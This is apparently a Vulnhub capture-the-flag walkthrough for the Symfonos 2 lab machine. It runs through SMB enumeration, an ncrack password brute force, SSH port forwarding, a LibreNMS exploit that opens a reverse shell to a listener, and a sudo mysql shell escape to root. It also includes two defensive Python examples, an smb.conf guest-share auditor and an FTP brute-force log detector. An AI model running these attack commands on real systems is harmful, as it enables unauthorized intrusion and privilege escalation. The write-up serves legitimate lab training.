Symfonos 2

Symfonos 2 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sym2 192.168.43.97
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 10:27 EDT
Nmap scan report for symfonos2 (192.168.43.97)
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1  Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:03:48:23 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2020-05-15T09:27:31-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T14:27:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds

Enum4linux

enum4linux -a 192.168.43.97
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 11:08:47 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.43.97
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.43.97    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.43.97    |
 ============================================= 
Looking up status of 192.168.43.97
        SYMFONOS2       <00> -         B <ACTIVE>  Workstation Service
        SYMFONOS2       <03> -         B <ACTIVE>  Messenger Service
        SYMFONOS2       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.43.97    |
 ====================================== 
[+] Server 192.168.43.97 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.43.97    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.43.97    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.97 from smbclient: 
[+] Got OS info for 192.168.43.97 from srvinfo:
        SYMFONOS2      Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.43.97    |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|    Share Enumeration on 192.168.43.97    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS2

[+] Attempting to map shares on 192.168.43.97
//192.168.43.97/print$  Mapping: DENIED, Listing: N/A
//192.168.43.97/anonymous       Mapping: OK, Listing: OK
//192.168.43.97/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.43.97    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 192.168.43.97 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.43.97    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.43.97 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-629329663-2933547119-2337616968
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-629329663-2933547119-2337616968 and logon username '', password ''
S-1-5-21-629329663-2933547119-2337616968-500 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-501 SYMFONOS2\nobody (Local User)
S-1-5-21-629329663-2933547119-2337616968-513 SYMFONOS2\None (Domain Group)

 ============================================== 
|    Getting printer info for 192.168.43.97    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 15 11:09:08 2020

We can see here that there is an anonymous share, and that it can be mapped and listed without credentials.

We can then use smbclient to see what's inside.

smbclient

smbclient //192.168.43.97/anonymous

We can then ls to list the files inside the anonymous share. There is a backup folder; change directory into it and download log.txt by typing get log.txt.

This is the content of log.txt:

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes

root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            aeolus
Group                           aeolus

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite          on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User                          ftp
  Group                         ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias                     anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients                    10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  #DisplayLogin                 welcome.msg
  #DisplayChdir                 .message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>

As we can see here, we have a user called aeolus, so maybe we can brute-force the ssh login using hydra.
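The settings that let enum4linux map this share without credentials are all in the smb.conf above: guest ok = yes on [anonymous], and map to guest = bad user plus usershare allow guests = yes in [global]. The following audit script is an added example, not part of the walkthrough; it parses a constructed excerpt of that smb.conf with its own small parser (configparser mis-reads Samba's indented keys as continuation lines), and the function names are my own.

```python
# Added example: audit an smb.conf for shares reachable without credentials.
# Not part of the walkthrough; config text is a constructed excerpt of log.txt.
from __future__ import annotations

# Constructed excerpt of the smb.conf shown in log.txt (keys kept as on the box).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = bad user
   usershare allow guests = yes
;   include = /home/samba/etc/smb.conf.%m

[homes]
   browseable = no
   read only = yes
   valid users = %S

[print$]
   path = /var/lib/samba/printers
   read only = yes
   guest ok = no
;   write list = root, @lpadmin

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes
"""


def _is_yes(value: str | None) -> bool:
    """Samba boolean: yes/true/1 are true, anything else is false."""
    return (value or "").strip().lower() in {"yes", "true", "1"}


def parse_smb_conf(text: str) -> dict[str, dict[str, str]]:
    """Parse smb.conf into {section: {normalised key: value}}.

    configparser is avoided on purpose: smb.conf indents every key and
    configparser would read indented lines as continuations of the previous
    value. Both '#' and ';' start comment lines. Samba ignores case and
    internal whitespace in keys ('guest ok' == 'guestok'), and 'public' is
    an alias for 'guest ok'.
    """
    sections: dict[str, dict[str, str]] = {}
    current: dict[str, str] | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
            continue
        if current is None or "=" not in line:
            continue  # key before any [section], or a malformed line
        key, _, value = line.partition("=")
        key = "".join(key.lower().split())
        current["guestok" if key == "public" else key] = value.strip()
    return sections


def audit(text: str) -> dict:
    """Report the global guest mapping plus every share a guest can reach."""
    sections = parse_smb_conf(text)
    glob = sections.get("global", {})
    report = {
        # 'bad user' turns failed logins with unknown usernames into guest.
        "map_to_guest": glob.get("maptoguest", "never"),
        "usershare_allow_guests": _is_yes(glob.get("usershareallowguests")),
        "guest_shares": [],
    }
    for name, params in sections.items():
        if name == "global":
            continue
        # Per-share 'guest ok' overrides the [global] value; the default is no.
        if not _is_yes(params.get("guestok", glob.get("guestok", "no"))):
            continue
        # 'writable'/'writeable' = yes means the same as 'read only' = no.
        wr = params.get("writable", params.get("writeable"))
        if wr is not None:
            read_only = not _is_yes(wr)
        else:
            read_only = _is_yes(params.get("readonly", glob.get("readonly", "yes")))
        report["guest_shares"].append({
            "share": name,
            "path": params.get("path", ""),
            "browseable": _is_yes(params.get("browseable", "yes")),
            "read_only": read_only,
        })
    return report
```

Run against the real file with audit(open("/etc/samba/smb.conf").read()) to list every guest-reachable share and whether it is writable.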

Exploitation

ncrack

ncrack -v -u aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.43.97

We can see the password for the user aeolus is sergioteamo.
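From the defender's side, the ncrack run above leaves a burst of failed ProFTPD logins for one user from one source, followed by a success, in the auth log. The sliding-window detector below is an added example, not part of the walkthrough; the log lines are constructed in the shape ProFTPD writes to syslog, and the thresholds and function names are my own.

```python
# Added example: flag FTP password guessing in ProFTPD auth logs.
# Not part of the walkthrough; the log lines below are constructed.
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed lines in the shape ProFTPD writes to syslog (no year in the
# timestamp). Hosts and IPs follow the walkthrough's lab setup.
SAMPLE_LOG = """\
May 15 11:20:01 symfonos2 proftpd[2101] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus (Login failed): Incorrect password.
May 15 11:20:01 symfonos2 proftpd[2102] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus (Login failed): Incorrect password.
May 15 11:20:02 symfonos2 proftpd[2103] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus (Login failed): Incorrect password.
May 15 11:20:02 symfonos2 proftpd[2104] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus (Login failed): Incorrect password.
May 15 11:20:03 symfonos2 proftpd[2105] symfonos2 (192.168.43.182[192.168.43.182]): FTP session opened.
May 15 11:20:03 symfonos2 proftpd[2105] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus (Login failed): Incorrect password.
May 15 11:20:04 symfonos2 proftpd[2106] symfonos2 (192.168.43.182[192.168.43.182]): USER aeolus: Login successful.
May 15 11:25:00 symfonos2 proftpd[2199] symfonos2 (192.168.43.50[192.168.43.50]): USER cronus (Login failed): Incorrect password.
May 15 11:30:00 symfonos2 proftpd[2230] symfonos2 (192.168.43.50[192.168.43.50]): USER cronus: Login successful.
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\] \S+ "
    r"\((?P<host>[^\[]+)\[(?P<ip>[^\]]+)\]\): USER (?P<user>\S+?)"
    r"(?: \(Login failed\): (?P<reason>.*)|: Login successful\.)$"
)


def parse_line(line: str):
    """Return (timestamp, ip, user, failed) for login lines, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; the parsed year (1900) is only ever
    # used for differences between lines, so it does not matter here.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["ip"], m["user"], m["reason"] is not None


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60):
    """Sliding-window detector keyed on source IP.

    Emits one 'bruteforce' finding when an IP reaches `threshold` failed
    logins inside `window_seconds`, and a 'success_after_bruteforce'
    finding if that IP then logs in successfully while still over the
    threshold (the outcome of the ncrack run on this box).
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures in the window
    alerted = set()
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, user, failed = parsed
        q = recent[ip]
        if failed:
            q.append(ts)
        # Drop failures that have aged out of the window.
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) < threshold:
            continue
        if failed and ip not in alerted:
            alerted.add(ip)
            findings.append({"type": "bruteforce", "ip": ip, "user": user,
                             "failures": len(q), "at": ts.strftime("%H:%M:%S")})
        elif not failed:
            findings.append({"type": "success_after_bruteforce", "ip": ip,
                             "user": user, "at": ts.strftime("%H:%M:%S")})
    return findings
```

The single failure from 192.168.43.50 followed by a success five minutes later stays below the threshold and produces nothing, which is the benign mistyped-password case.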

ftp

After that, we can use ftp to log in.

ftp 192.168.43.97

Then I realized that we can also ssh in as that user.

ssh

ssh aeolus@192.168.43.97

I have been looking through a lot of directories and can't seem to find a way forward. After looking at a walkthrough, I found out that there is an apache directory.

Navigating to /etc/apache, we find a few folders; going into the sites-enabled folder, we find a file called librenms.conf.

cat that file and we find this:

We can see that there is a server running at localhost port 8080.

We now need to forward that port using ssh tunneling so that we can reach it from our machine.

ssh tunneling

ssh -L 9000:localhost:8080 aeolus@192.168.43.97

Then we can use our browser to open the web page.

Exploit

It is LibreNMS. I went to searchsploit, did a quick lookup and got the exploit.

After that, copy the exploit to a directory and set it up.

The exploit actually requires the URL, cookies, and remote host and port.

I used Burp Suite to intercept the traffic and got the cookies from it.

Before running the command, remember to set up a listener on our machine.

The command should look like this:

python 47044.py http://localhost:9000 "XSRF-TOKEN=eyJpdiI6InJXNnlUNWVmaDZxbVJDQ3JjY2tVZEE9PSIsInZhbHVlIjoidFh0VGhjditaNm9YNWxnaGgxVHIranBiZzBTTTlEYUgzckRiXC9KK0pBT2htXC9cL0FKVEVIYkNwUkZuTmNvK3R3cGdpbEFXeisyTUhqQVBtXC9nU0t5VHh3PT0iLCJtYWMiOiJjNTU1NjcxYzc3Y2Q3ZjBhYjU5NzBhZDA2ZGY0MmI5OWQ2Yzc5N2MyOTcxMWY4YjUzZWJlYzFiZDI3NTJhOWUxIn0%3D; librenms_session=eyJpdiI6IkY3bVU4d2lnSCtTdmlrRjJ1bjRSeUE9PSIsInZhbHVlIjoiSEsxOHhDXC91QytSSmcyMHBJdEkrcUlmSVlrR29VaGp2ckxqQ0I5d1poWlwvQk0rRTBNRnJjQVdWYU5SdENrb1J0Z2VTNnlFS0FQdHdYeUhoQzNvVTE0dz09IiwibWFjIjoiNDRjYTQ4ZDk5NTM2Y2FkNDI4NzAwNDhhMjg2MjRlMTk3MTMzNzIzM2Q2NDI4NjYyNjQ2NjcwZWJmZDcyN2E2YyJ9; PHPSESSID=2jmu3np8ppkk80uu94b620rnc5" 192.168.43.182 5555

We successfully connect back as the user cronus.

Privilege Escalation

We first get a proper shell by typing:

python -c 'import pty; pty.spawn("/bin/bash")'

When we type sudo -l, it shows us this:

Thanks to this website that my senior sent me, I managed to find a suitable command to get root.

sudo mysql -e '\! /bin/sh'

Got root access!

Congratulations!
